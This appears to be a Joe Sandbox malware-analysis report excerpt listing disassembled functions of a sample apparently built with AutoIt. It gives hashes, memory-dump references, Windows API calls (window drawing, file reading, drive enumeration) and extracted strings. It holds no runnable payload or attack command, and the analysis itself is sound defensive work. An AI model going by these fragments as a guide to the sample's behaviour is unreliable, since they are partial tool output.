                                    • Opcode Fuzzy Hash: c85502f966587e7cf9657ff22242438096ae2adf60ff3619a27b8bca9f5b7767
                                    • Instruction Fuzzy Hash: 4A9269706083419FDB24DF18C484B6ABBE5BF88308F14885DF99A8B3A2D775ED45CB52
                                    Function 0098E3B0 Relevance: .5, Instructions: 540COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b16d7c6aeb28e6346574dc645cd2f2fd70ccd5cf6e68a8e0c990b6b42320c1e
                                    • Instruction ID: 882cf7011ad7b8a4671537b8e81dd6043c1bd49392d8e616374e557339412fd4
                                    • Opcode Fuzzy Hash: 0b16d7c6aeb28e6346574dc645cd2f2fd70ccd5cf6e68a8e0c990b6b42320c1e
                                    • Instruction Fuzzy Hash: 8122BC70E0420A9FDB24EF58C4A0BBEF7B4FF58314F148469E95A9B351E335A981CB91
                                    Function 009893F0 Relevance: .5, Instructions: 531COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 77baaf85f7037019e1a218069ce3e8586bd2dec6c6797afd40eb73a5d2bcfd8f
                                    • Instruction ID: 6d16b188ba15f32685f58a68735e1a701a94ee5df138cfabb8b102d8d828b5ac
                                    • Opcode Fuzzy Hash: 77baaf85f7037019e1a218069ce3e8586bd2dec6c6797afd40eb73a5d2bcfd8f
                                    • Instruction Fuzzy Hash: 92126B70A00609EFDF04EFA9D985ABEB7F9FF48300F148569E806E7250EB35A911CB54
                                    Function 0098AF50 Relevance: .5, Instructions: 514COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 3728558374-0
                                    • Opcode ID: 1371acaf35cd660eaf057fa5014b90c60944b572722b1ff9788706c3e9d8cde1
                                    • Instruction ID: a68f18f583bad7df243bb9be1c525ac8bc481f2367d152fb94130808c239cfa3
                                    • Opcode Fuzzy Hash: 1371acaf35cd660eaf057fa5014b90c60944b572722b1ff9788706c3e9d8cde1
                                    • Instruction Fuzzy Hash: 57029F70A00209DBDF04EF68D991BAEBBB5FF84300F148469E906DB395EB35DA15CB91
                                    Function 009A02A4 Relevance: .3, Instructions: 345COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                    • Instruction ID: 1b69f4f3828a0bbbec70ea8560542c03b8cccdbb99449495265bdb6156ece36e
                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                    • Instruction Fuzzy Hash: FBC1B2322055A30ADF2D467E843443EFAA55AE2BB531A176DE8B3CB4E5FF20C524D660
                                    Function 009A06D9 Relevance: .3, Instructions: 341COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                    • Instruction ID: cef2fc28e40134aa6697d31b991e115e38b614b73b5cd5c98c8e20a593ddfaf3
                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                    • Instruction Fuzzy Hash: C6C1A0322055930AEF6D463EC43453EFAA95AE3BB131A076DD4B3CB4D5EF20D528D660
                                    Function 0099FA57 Relevance: .3, Instructions: 323COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: 3689d25faf122578b09900e3c11f72986f1fadfb8f7daee527dd3144cab6914c
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: 7EC19E322094930ADF2D467EC47443EFAA95AA2BB531A077DD8B3CB5D5FF20C564D620
                                    Function 009DA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 009DA2FE
                                    • DeleteObject.GDI32(00000000), ref: 009DA310
                                    • DestroyWindow.USER32 ref: 009DA31E
                                    • GetDesktopWindow.USER32 ref: 009DA338
                                    • GetWindowRect.USER32(00000000), ref: 009DA33F
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009DA480
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009DA490
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA4D8
                                    • GetClientRect.USER32(00000000,?), ref: 009DA4E4
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009DA51E
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA540
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA553
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA55E
                                    • GlobalLock.KERNEL32(00000000), ref: 009DA567
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA576
                                    • GlobalUnlock.KERNEL32(00000000), ref: 009DA57F
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA586
                                    • GlobalFree.KERNEL32(00000000), ref: 009DA591
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA5A3
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A0D9BC,00000000), ref: 009DA5B9
                                    • GlobalFree.KERNEL32(00000000), ref: 009DA5C9
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009DA5EF
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009DA60E
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA630
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA81D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: 09c354eb9159f1b25566abc0814d96f6ad2e50c22464729a144f483d776db4d4
                                    • Instruction ID: 5ec785d81fc9488c99ba06d5b1049632dfa72469fc911e6a9ae17b67855003f8
                                    • Opcode Fuzzy Hash: 09c354eb9159f1b25566abc0814d96f6ad2e50c22464729a144f483d776db4d4
                                    • Instruction Fuzzy Hash: A0026E76900208EFDB14DFE4CD89EAE7BB9FB89310F048559F915AB2A0C7749D42CB60
                                    Function 009ED285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 009ED2DB
                                    • GetSysColorBrush.USER32(0000000F), ref: 009ED30C
                                    • GetSysColor.USER32(0000000F), ref: 009ED318
                                    • SetBkColor.GDI32(?,000000FF), ref: 009ED332
                                    • SelectObject.GDI32(?,00000000), ref: 009ED341
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009ED36C
                                    • GetSysColor.USER32(00000010), ref: 009ED374
                                    • CreateSolidBrush.GDI32(00000000), ref: 009ED37B
                                    • FrameRect.USER32(?,?,00000000), ref: 009ED38A
                                    • DeleteObject.GDI32(00000000), ref: 009ED391
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 009ED3DC
                                    • FillRect.USER32(?,?,00000000), ref: 009ED40E
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009ED439
                                      • Part of subcall function 009ED575: GetSysColor.USER32(00000012), ref: 009ED5AE
                                      • Part of subcall function 009ED575: SetTextColor.GDI32(?,?), ref: 009ED5B2
                                      • Part of subcall function 009ED575: GetSysColorBrush.USER32(0000000F), ref: 009ED5C8
                                      • Part of subcall function 009ED575: GetSysColor.USER32(0000000F), ref: 009ED5D3
                                      • Part of subcall function 009ED575: GetSysColor.USER32(00000011), ref: 009ED5F0
                                      • Part of subcall function 009ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009ED5FE
                                      • Part of subcall function 009ED575: SelectObject.GDI32(?,00000000), ref: 009ED60F
                                      • Part of subcall function 009ED575: SetBkColor.GDI32(?,00000000), ref: 009ED618
                                      • Part of subcall function 009ED575: SelectObject.GDI32(?,?), ref: 009ED625
                                      • Part of subcall function 009ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 009ED644
                                      • Part of subcall function 009ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009ED65B
                                      • Part of subcall function 009ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 009ED670
                                      • Part of subcall function 009ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009ED698
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 3521893082-0
                                    • Opcode ID: 5d76514888c24f36e22e505fb9d2878b3e03285ee03389700da2772393751a02
                                    • Instruction ID: 22b01dfa67d5b773daaec41a9384f438b570f8cdebb3507306c50e88b4f286e1
                                    • Opcode Fuzzy Hash: 5d76514888c24f36e22e505fb9d2878b3e03285ee03389700da2772393751a02
                                    • Instruction Fuzzy Hash: 90919072009305BFCB11DFA4DC08E6B7BA9FF89325F101A19F962961E0D771E946CB52
                                    Function 0099B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32 ref: 0099B98B
                                    • DeleteObject.GDI32(00000000), ref: 0099B9CD
                                    • DeleteObject.GDI32(00000000), ref: 0099B9D8
                                    • DestroyCursor.USER32(00000000), ref: 0099B9E3
                                    • DestroyWindow.USER32(00000000), ref: 0099B9EE
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 009FD2AA
                                    • 6F540200.COMCTL32(?,000000FF,?), ref: 009FD2E3
                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 009FD711
                                      • Part of subcall function 0099B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0099B759,?,00000000,?,?,?,?,0099B72B,00000000,?), ref: 0099BA58
                                    • SendMessageW.USER32 ref: 009FD758
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009FD76F
                                    • 6F520860.COMCTL32(00000000), ref: 009FD785
                                    • 6F520860.COMCTL32(00000000), ref: 009FD790
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DestroyMessageSendWindow$DeleteF520860Object$CursorF540200InvalidateMoveRect
                                    • String ID: 0
                                    • API String ID: 2041435895-4108050209
                                    • Opcode ID: 1e077cb47da794e8865d6a5d03b1aacefd49b0d29ac900d584c9ce794219f671
                                    • Instruction ID: b2bd6985677e44a44e39dc0745d8e8f43a03c227e0c2e42f382d065bef6a7456
                                    • Opcode Fuzzy Hash: 1e077cb47da794e8865d6a5d03b1aacefd49b0d29ac900d584c9ce794219f671
                                    • Instruction Fuzzy Hash: 4112AC71205209DFDB11CF68D988BB9B7EABF45308F144569FA89CB262C735EC42CB91
                                    Function 009CDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 009CDBD6
                                    • GetDriveTypeW.KERNEL32(?,00A1DC54,?,\\.\,00A1DC00), ref: 009CDCC3
                                    • SetErrorMode.KERNEL32(00000000,00A1DC54,?,\\.\,00A1DC00), ref: 009CDE29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: 62e5ea2bb55f5ffececd4271dd50435bbb2159ca64354a5cf9c58d7cfbbfe1eb
                                    • Instruction ID: daec9203a21439b55efc8f0ec1479911cd5a9ce970fc966481552adbafb66434
                                    • Opcode Fuzzy Hash: 62e5ea2bb55f5ffececd4271dd50435bbb2159ca64354a5cf9c58d7cfbbfe1eb
                                    • Instruction Fuzzy Hash: 59518B31E49302ABCA00EF24C882F29B7A4FB94705F205D6EF0479B6D1DA64D946DB43
                                    Function 0098CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 46a120d891c26b24d8e4da31d121bce80c1b9045d717a432cc0539c580bf0c19
                                    • Instruction ID: cb1f4289207b43232f8fdced7f53c223ad779521a6a0f1f35de00fdb29f945f1
                                    • Opcode Fuzzy Hash: 46a120d891c26b24d8e4da31d121bce80c1b9045d717a432cc0539c580bf0c19
                                    • Instruction Fuzzy Hash: 0081F7B1640219BBCB24BB68DD82FBF777CAF65310F144429F905AA2C2EB74D941C7A1
                                    Function 009EC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 009EC788
                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 009EC83E
                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 009EC859
                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 009ECB15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: 0
                                    • API String ID: 2326795674-4108050209
                                    • Opcode ID: 18084bb29713178b6cf7b8b5532d538b7434d5d6feb05a772c05c1b832073461
                                    • Instruction ID: 0cade907614004d0198ee3401a8c65e136ff1c81d9962cecc614b7244ae80db7
                                    • Opcode Fuzzy Hash: 18084bb29713178b6cf7b8b5532d538b7434d5d6feb05a772c05c1b832073461
                                    • Instruction Fuzzy Hash: E8F1E2B1104385AFD722CF65CC89BAABBE8FF49314F080929F5C9962A1C775DC42CB91
                                    Function 009E638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,00A1DC00), ref: 009E6449
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 3964851224-45149045
                                    • Opcode ID: 7b26a310e4f9a28409c524a91571376b13711770b6c96b3774dd3a08578ac7d4
                                    • Instruction ID: 50d3ccdbe9b8a773120d9284614350b8c29c5570b082d22901d9bfd971a6a8f1
                                    • Opcode Fuzzy Hash: 7b26a310e4f9a28409c524a91571376b13711770b6c96b3774dd3a08578ac7d4
                                    • Instruction Fuzzy Hash: A1C180302043858BCB05EF15C551BBE77A5BFE8394F044859F8965B3E2EB25ED4ACB82
                                    Function 009ED575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 009ED5AE
                                    • SetTextColor.GDI32(?,?), ref: 009ED5B2
                                    • GetSysColorBrush.USER32(0000000F), ref: 009ED5C8
                                    • GetSysColor.USER32(0000000F), ref: 009ED5D3
                                    • CreateSolidBrush.GDI32(?), ref: 009ED5D8
                                    • GetSysColor.USER32(00000011), ref: 009ED5F0
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 009ED5FE
                                    • SelectObject.GDI32(?,00000000), ref: 009ED60F
                                    • SetBkColor.GDI32(?,00000000), ref: 009ED618
                                    • SelectObject.GDI32(?,?), ref: 009ED625
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009ED644
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009ED65B
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009ED670
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009ED698
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009ED6BF
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 009ED6DD
                                    • DrawFocusRect.USER32(?,?), ref: 009ED6E8
                                    • GetSysColor.USER32(00000011), ref: 009ED6F6
                                    • SetTextColor.GDI32(?,00000000), ref: 009ED6FE
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 009ED712
                                    • SelectObject.GDI32(?,009ED2A5), ref: 009ED729
                                    • DeleteObject.GDI32(?), ref: 009ED734
                                    • SelectObject.GDI32(?,?), ref: 009ED73A
                                    • DeleteObject.GDI32(?), ref: 009ED73F
                                    • SetTextColor.GDI32(?,?), ref: 009ED745
                                    • SetBkColor.GDI32(?,?), ref: 009ED74F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
